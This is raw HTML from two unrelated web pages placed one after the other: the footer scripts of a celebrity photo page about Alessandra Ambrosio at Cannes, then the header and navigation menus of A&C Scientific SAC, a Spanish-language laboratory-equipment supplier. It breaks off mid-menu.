sidebarbox--></div><!--end: sidebar--><div align="center"><!-- BEGIN TECHNORATI MEDIA TAG --><!-- END TECHNORATI MEDIA TAG --></div></div><!--end: container--><div class="clear"></div><br /><script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({flush: true});</script><div align="center"><!-- Taboola Start --><div id="taboola-mid-article-thumbnails"></div><script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-mid-article-thumbnails', placement: 'Mid Article Thumbnails', target_type: 'mix' });</script> <!-- Taboola End --></div><!-- <div style="margin-left:30px;"></div> --><br /><hr style="width:75%;height:2px;color:black;align:center;"><div align="center"><span style="font-size: 10px; color:white;">All images that appear on the site are copyrighted to their respective owners and SawFirst.com claims no credit for them unless otherwise noted.<br /> If you own the rights to any of the images and do not wish them to appear on the site please <a href="mailto:[email protected]"><strong>contact us</strong></a>, and they will be promptly removed!<br /><a href="https://www.sawfirst.com/privacy-policy" title="Privacy Policy"><strong>Privacy Policy</strong></a></span></div></div><!--end: wrapper--><script type="text/javascript">var infolinks_pid = 3137868;var infolinks_wsid = 0;</script><script type="text/javascript" src="//resources.infolinks.com/js/infolinks_main.js"></script><script type='text/javascript'>/* <![CDATA[ */var mashsb = {"shares":"57","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"https:\/\/www.sawfirst.com\/alessandra-ambrosio-at-les-miserables-screening-72nd-annual-cannes-film-festival-2019-05-16.html","title":"Alessandra+Ambrosio+at+%E2%80%98Les+Miserables%E2%80%99+Screening%2C+72nd+Annual+Cannes+Film+Festival","image":"https:\/\/www.sawfirst.com\/wp-content\/uploads\/2019\/05\/Alessandra-Ambrosio-at-Les-Miserables-Screening-6.jpg","desc":"Alessandra Ambrosio - 'Les Miserables' Screening, 72nd Annual Cannes Film Festival","hashtag":"SawFirst1","subscribe":"content","subscribe_url":"https:\/\/feedburner.google.com\/fb\/a\/mailverify?uri=sawfirst&loc=en_US","activestatus":"1","singular":"0","twitter_popup":"1","refresh":"0","nonce":"45f785abe4","postid":"","servertime":"1558024154","ajaxurl":"https:\/\/www.sawfirst.com\/wp-admin\/admin-ajax.php"};/* ]]> */</script><script type='text/javascript' src='https://www.sawfirst.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.6.3'></script><script type='text/javascript' src='https://www.sawfirst.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script></body></html> <!--WP-Compress-HTML Uncompressed size: 59862 bytes; Compressed size: 55804 bytes; 6.78% savings-->
0
<!DOCTYPE html> <html lang="en-US" class="scheme_scheme_2"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="format-detection" content="telephone=no"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.acssac.com/xmlrpc.php" /> <link rel="icon" type="image/x-icon" href="http://acssac.com/wp-content/uploads/2017/05/acssac_favicon.fw_.png" /><title>A&amp;C Scientific SAC</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="A&amp;C Scientific SAC &raquo; Feed" href="http://www.acssac.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="A&amp;C Scientific SAC &raquo; Comments Feed" href="http://www.acssac.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.acssac.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.1"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b===c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='ccw_main_css-css' href='http://www.acssac.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6' type='text/css' media='all' /> <link rel='stylesheet' id='essential-grid-plugin-settings-css' href='http://www.acssac.com/wp-content/plugins/essential-grid/public/assets/css/settings.css?ver=2.0.9.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-open-sans-css' href='http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700%2C800&#038;ver=4.8.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-raleway-css' href='http://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900&#038;ver=4.8.1' type='text/css' media='all' /> <link rel='stylesheet' id='tp-droid-serif-css' href='http://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C700&#038;ver=4.8.1' type='text/css' media='all' /> <link rel='stylesheet' id='SFSImainCss-css' href='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/css/sfsi-style.css?ver=4.8.1' type='text/css' media='all' /> <link rel='stylesheet' id='wpos-slick-style-css' href='http://www.acssac.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/css/slick.css?ver=2.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='logo_showcase_style-css' href='http://www.acssac.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/css/logo-showcase.css?ver=2.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-font-google_fonts-style-css' href='http://fonts.googleapis.com/css?family=Roboto+Slab:300,300italic,400,400italic,700,700italic,900,900italic|Montserrat:300,300italic,400,400italic,700,700italic,900,900italic|Lato:300,300italic,400,400italic,700,700italic,900,900italic&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-fontello-style-css' href='http://www.acssac.com/wp-content/themes/albertino/css/fontello/css/fontello.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-main-style-css' href='http://www.acssac.com/wp-content/themes/albertino/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-animation-style-css' href='http://www.acssac.com/wp-content/themes/albertino/fw/css/core.animation.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-shortcodes-style-css' href='http://www.acssac.com/wp-content/themes/albertino/shortcodes/theme.shortcodes.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-plugin.instagram-widget-style-css' href='http://www.acssac.com/wp-content/themes/albertino/css/plugin.instagram-widget.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-skin-style-css' href='http://www.acssac.com/wp-content/themes/albertino/skins/default/skin.css' type='text/css' media='all' /> <link rel='stylesheet' id='albertino-custom-style-css' href='http://www.acssac.com/wp-content/themes/albertino/fw/css/custom-style.css' type='text/css' media='all' /> <style id='albertino-custom-style-inline-css' type='text/css'> .contacts_wrap .logo img{height:30px} </style> <link rel='stylesheet' id='albertino-responsive-style-css' href='http://www.acssac.com/wp-content/themes/albertino/css/responsive.css' type='text/css' media='all' /> <link rel='stylesheet' id='theme-skin-responsive-style-css' href='http://www.acssac.com/wp-content/themes/albertino/skins/default/skin.responsive.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='http://www.acssac.com/wp-includes/js/mediaelement/mediaelementplayer.min.css?ver=2.22.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='http://www.acssac.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=4.8.1' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='http://www.acssac.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12' type='text/css' media='all' /> <link rel='stylesheet' id='msl-main-css' href='http://www.acssac.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='msl-custom-css' href='http://www.acssac.com/wp-content/uploads/master-slider/custom.css?ver=3.6' type='text/css' media='all' /> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.acssac.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/essential-grid/public/assets/js/lightbox.js?ver=2.0.9.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/essential-grid/public/assets/js/jquery.themepunch.tools.min.js?ver=2.0.9.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/plugins/essential-grid/public/assets/js/jquery.themepunch.essential.min.js?ver=2.0.9.1'></script> <script type='text/javascript' src='http://www.acssac.com/wp-content/themes/albertino/fw/js/photostack/modernizr.min.js'></script> <link rel='https://api.w.org/' href='http://www.acssac.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.acssac.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.acssac.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.8.1" /> <link rel="canonical" href="http://www.acssac.com/" /> <link rel='shortlink' href='http://www.acssac.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.acssac.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.acssac.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.acssac.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.acssac.com%2F&#038;format=xml" /> <script>var ms_grabbing_curosr = 'http://www.acssac.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'http://www.acssac.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script> <meta name="generator" content="MasterSlider 3.0.2 - Responsive Touch Image Slider | www.avt.li/msf" /> <meta name="specificfeeds-verification-code-YmRXYVJ3Q0EwVmk4TWNNM2hRb09XWFl5ajZCb0s2MHhPS3RxMmdSZDJKdzFTNkE2SHNYTkJHUExMMmVnL0hTSEFCUWs1N1F4ekw2Ni9XZXVWeXN2Tm9DY1lXWkg3b2NtZDdNaVU1RGQ0SGNJZ0RqWGsrSER5QUZTZWVWRjVtUW98S1FyREU4a0dhOGtkSXkzRk45TmRIcHZoT2syS0Q4VUhsdVNVYnlXaDVvaz0=" content="w962qLuxQmclckNnGc0K"/><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.acssac.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://www.acssac.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #1e73be; } </style> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1456238859234{margin-top: 6rem !important;}.vc_custom_1456239000515{margin-top: 6rem !important;padding-top: 6rem !important;padding-bottom: 6rem !important;background-color: #f5f5f5 !important;}.vc_custom_1456159616762{padding-bottom: 6rem !important;}.vc_custom_1550613852453{margin-top: 50px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head> <body class="home page-template-default page page-id-137 custom-background _masterslider _ms_version_3.0.2 albertino_body body_style_wide body_filled theme_skin_default article_style_stretch layout_single-standard template_single-standard scheme_scheme_2 top_panel_show top_panel_above sidebar_hide sidebar_outer_hide wpb-js-composer js-comp-ver-4.12 vc_responsive"> <a id="toc_home" class="sc_anchor" title="Home" data-description="&lt;i&gt;Return to Home&lt;/i&gt; - &lt;br&gt;navigate to home page of the site" data-icon="icon-home" data-url="http://www.acssac.com/" data-separator="yes"></a><a id="toc_top" class="sc_anchor" title="To Top" data-description="&lt;i&gt;Back to top&lt;/i&gt; - &lt;br&gt;scroll to top of the page" data-icon="icon-double-up" data-url="" data-separator="yes"></a> <div class="body_wrap"> <div class="page_wrap"> <div class="top_panel_fixed_wrap"></div> <header class="top_panel_wrap top_panel_style_1 scheme_original"> <div class="top_panel_wrap_inner top_panel_inner_style_1 top_panel_position_above"> <div class="top_panel_top"> <div class="content_wrap clearfix"> <div class="top_panel_top_user_area"> <div class="top_panel_top_socials"> </div> <ul id="menu_user" class="menu_user_nav"> </ul> </div> </div> </div> <div class="top_panel_middle" > <div class="content_wrap"> <div class="columns_wrap columns_fluid"> <div class="column-2_5 contact_logo"> <div class="logo"> <a href="http://www.acssac.com/"><img src="http://acssac.com/wp-content/uploads/2017/05/acssaclogo2.png" class="logo_main" alt=""></a> </div> </div></div> </div> </div> <div class="top_panel_bottom"> <div class="content_wrap clearfix"> <nav class="menu_main_nav_area"> <ul id="menu_main" class="menu_main_nav"><li id="menu-item-655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-655"><a href="http://www.acssac.com/quienes-somos/">Nosotros</a></li> <li id="menu-item-656" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-656"><a href="http://www.acssac.com/analitica/">Analítica</a> <ul class="sub-menu"> <li id="menu-item-750" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-750"><a href="http://www.acssac.com/analitica/cromatografia/">Cromatografía</a> <ul class="sub-menu"> <li id="menu-item-751" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-751"><a href="http://www.acssac.com/analitica/cromatografia/hplc/">HPLC</a></li> <li id="menu-item-752" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-752"><a href="http://www.acssac.com/analitica/cromatografia/rhplc/">RHPLC</a></li> <li id="menu-item-753" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-753"><a href="http://www.acssac.com/analitica/cromatografia/uhplc/">UHPLC</a></li> <li id="menu-item-754" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-754"><a href="http://www.acssac.com/analitica/cromatografia/prep-hplc-2/">Prep HPLC</a></li> <li id="menu-item-755" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-755"><a href="http://www.acssac.com/analitica/cromatografia/sistemas-sfc/">Sistemas SFC</a></li> <li id="menu-item-756" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-756"><a href="http://www.acssac.com/analitica/cromatografia/software-hplc/">Software HPLC</a></li> </ul> </li> <li id="menu-item-757" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-757"><a href="http://www.acssac.com/analitica/espectroscopia/">Espectroscopía</a> <ul class="sub-menu"> <li id="menu-item-758" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-758"><a href="http://www.acssac.com/analitica/espectroscopia/dicroismo-circular/">Dicroísmo Circular</a></li> <li id="menu-item-759" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-759"><a href="http://www.acssac.com/analitica/espectroscopia/polarimetria-digital/">Polarimetría Digital</a></li> <li id="menu-item-760" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-760"><a href="http://www.acssac.com/analitica/espectroscopia/raman/">Microscopía Raman</a></li> <li id="menu-item-761" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-761"><a href="http://www.acssac.com/analitica/espectroscopia/sondas-raman/">Sondas Raman</a></li> <li id="menu-item-763" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-763"><a href="http://www.acssac.com/analitica/espectroscopia/ftir/">FTIR</a></li> <li id="menu-item-764" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-764"><a href="http://www.acssac.com/analitica/espectroscopia/ftir-portable/">FTIR Portátil</a></li> <li id="menu-item-762" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-762"><a href="http://www.acssac.com/analitica/espectroscopia/microscopia-ftir/">Microscopía FTIR</a></li> <li id="menu-item-765" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-765"><a href="http://www.acssac.com/analitica/espectroscopia/espectroscopia-uvvisnir/">Espectroscopía UV/VIS/NIR</a></li> <li id="menu-item-771" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-771"><a href="http://www.acssac.com/analitica/espectroscopia/microscopia-uvvisnir/">Microscopía UV/VIS/NIR</a></li> <li id="menu-item-766" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-766"><a href="http://www.acssac.com/analitica/espectroscopia/fluorescencia/">Fluorescencia</a></li> <li id="menu-item-767" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-767"><a href="http://www.acssac.com/analitica/espectroscopia/test-de-disolucion/">Test de disolución</a></li> <li id="menu-item-772" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-772"><a href="http://www.acssac.com/analitica/espectroscopia/software-de-espectroscopia/">Software de Espectroscopia</a></li> <li id="menu-item-768" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-768"><a href="http://www.acssac.com/analitica/espectroscopia/dicroismo-circular-vibracional-vcd/">Dicroísmo Circular Vibracional VCD</a></li> <li id="menu-item-769" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-769"><a href="http://www.acssac.com/analitica/espectroscopia/film-thickness/">Medidor de espesor de película</a></li> <li id="menu-item-770" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-770"><a href="http://www.acssac.com/analitica/espectroscopia/near-field-scanning/">Exploracion de campo cercano</a></li> </ul> </li> <li id="menu-item-781" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-781"><a href="http://www.acssac.com/analitica/espectroscopia/columnas-para-hplc/">Columnas para HPLC</a></li> </ul> </li> <li id="menu-item-657" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-657"><a href="http://www.acssac.com/biologia-molecular/">Biología Molecular</a></li> <li id="menu-item-812" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-812"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/">Imágenes</a> <ul class="sub-menu"> <li id="menu-item-782" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-782"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/">Imagen de Resonancia Magnética preclínica ( MRI )</a> <ul class="sub-menu"> <li id="menu-item-875" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-875"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/icon/">Icon</a></li> <li id="menu-item-876" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-876"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/bio-spec3t/">BioSpec 3T</a></li> <li id="menu-item-877" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-877"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/bio-spec/">BioSpec</a></li> <li id="menu-item-878" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-878"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/pharmascan/">PharmaScan</a></li> </ul> </li> </ul> </li> <li id="menu-item-1292" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1292"><a href="http://www.acssac.com/disenos-de-laboratorios/">Diseño de Laboratorios</a></li> <li id="menu-item-1206" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1206"><a href="http://www.acssac.com/bioterios/">Bioterios</a> <ul class="sub-menu"> <li id="menu-item-1207" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1207"><a href="http://www.acssac.com/bioterios/">Proyectos de implementación de Bioterios</a></li> </ul> </li> <li id="menu-item-845" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-845"><a href="http://acssac.com/consultoria/tecnicas-en-biologia-molecular-y-celular/">Consultoría</a> <ul class="sub-menu"> <li id="menu-item-783" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-783"><a href="http://www.acssac.com/consultoria/tecnicas-en-biologia-molecular-y-celular/">Técnicas en Biología Molecular y Celular</a></li> <li id="menu-item-1129" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1129"><a href="http://www.acssac.com/consultoria/financiamiento-para-proyectos-de-inversion/">Financiamiento para proyectos de Inversión</a></li> <li id="menu-item-1128" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1128"><a href="http://www.acssac.com/consultoria/alquiler-de-equipos-cientificos/">Alquiler de equipos cientificos</a></li> <li id="menu-item-1130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1130"><a href="http://www.acssac.com/consultoria/soporte-cientifico-y-academico/">Soporte Científico y Académico</a></li> </ul> </li> <li id="menu-item-659" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-659"><a href="http://www.acssac.com/aliados/">Aliados</a></li> <li id="menu-item-660" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-660"><a href="http://www.acssac.com/blog/">Noticias</a></li> <li id="menu-item-664" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-664"><a href="http://www.acssac.com/contacto/">Contacto</a> <ul class="sub-menu"> <li id="menu-item-663" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-663"><a href="http://www.acssac.com/servicio-tecnico/">Servicio Técnico</a></li> </ul> </li> </ul> </nav> </div> </div> </div> </header> <div class="header_mobile"> <div class="content_wrap"> <div class="menu_button icon-menu"></div> <div class="logo"> <a href="http://www.acssac.com/"><img src="http://acssac.com/wp-content/uploads/2017/05/acssaclogo2.png" class="logo_main" alt=""></a> </div> </div> <div class="side_wrap"> <div class="close">Close</div> <div class="panel_top"> <nav class="menu_main_nav_area"> <ul id="menu_main" class="menu_main_nav"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-655"><a href="http://www.acssac.com/quienes-somos/">Nosotros</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-656"><a href="http://www.acssac.com/analitica/">Analítica</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-750"><a href="http://www.acssac.com/analitica/cromatografia/">Cromatografía</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-751"><a href="http://www.acssac.com/analitica/cromatografia/hplc/">HPLC</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-752"><a href="http://www.acssac.com/analitica/cromatografia/rhplc/">RHPLC</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-753"><a href="http://www.acssac.com/analitica/cromatografia/uhplc/">UHPLC</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-754"><a href="http://www.acssac.com/analitica/cromatografia/prep-hplc-2/">Prep HPLC</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-755"><a href="http://www.acssac.com/analitica/cromatografia/sistemas-sfc/">Sistemas SFC</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-756"><a href="http://www.acssac.com/analitica/cromatografia/software-hplc/">Software HPLC</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-757"><a href="http://www.acssac.com/analitica/espectroscopia/">Espectroscopía</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-758"><a href="http://www.acssac.com/analitica/espectroscopia/dicroismo-circular/">Dicroísmo Circular</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-759"><a href="http://www.acssac.com/analitica/espectroscopia/polarimetria-digital/">Polarimetría Digital</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-760"><a href="http://www.acssac.com/analitica/espectroscopia/raman/">Microscopía Raman</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-761"><a href="http://www.acssac.com/analitica/espectroscopia/sondas-raman/">Sondas Raman</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-763"><a href="http://www.acssac.com/analitica/espectroscopia/ftir/">FTIR</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-764"><a href="http://www.acssac.com/analitica/espectroscopia/ftir-portable/">FTIR Portátil</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-762"><a href="http://www.acssac.com/analitica/espectroscopia/microscopia-ftir/">Microscopía FTIR</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-765"><a href="http://www.acssac.com/analitica/espectroscopia/espectroscopia-uvvisnir/">Espectroscopía UV/VIS/NIR</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-771"><a href="http://www.acssac.com/analitica/espectroscopia/microscopia-uvvisnir/">Microscopía UV/VIS/NIR</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-766"><a href="http://www.acssac.com/analitica/espectroscopia/fluorescencia/">Fluorescencia</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-767"><a href="http://www.acssac.com/analitica/espectroscopia/test-de-disolucion/">Test de disolución</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-772"><a href="http://www.acssac.com/analitica/espectroscopia/software-de-espectroscopia/">Software de Espectroscopia</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-768"><a href="http://www.acssac.com/analitica/espectroscopia/dicroismo-circular-vibracional-vcd/">Dicroísmo Circular Vibracional VCD</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-769"><a href="http://www.acssac.com/analitica/espectroscopia/film-thickness/">Medidor de espesor de película</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-770"><a href="http://www.acssac.com/analitica/espectroscopia/near-field-scanning/">Exploracion de campo cercano</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-781"><a href="http://www.acssac.com/analitica/espectroscopia/columnas-para-hplc/">Columnas para HPLC</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-657"><a href="http://www.acssac.com/biologia-molecular/">Biología Molecular</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-812"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/">Imágenes</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-782"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/">Imagen de Resonancia Magnética preclínica ( MRI )</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-875"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/icon/">Icon</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-876"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/bio-spec3t/">BioSpec 3T</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-877"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/bio-spec/">BioSpec</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-878"><a href="http://www.acssac.com/imagenes/imagen-de-resonancia-magnetica-preclinica-mri/pharmascan/">PharmaScan</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1292"><a href="http://www.acssac.com/disenos-de-laboratorios/">Diseño de Laboratorios</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1206"><a href="http://www.acssac.com/bioterios/">Bioterios</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1207"><a href="http://www.acssac.com/bioterios/">Proyectos de implementación de Bioterios</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-845"><a 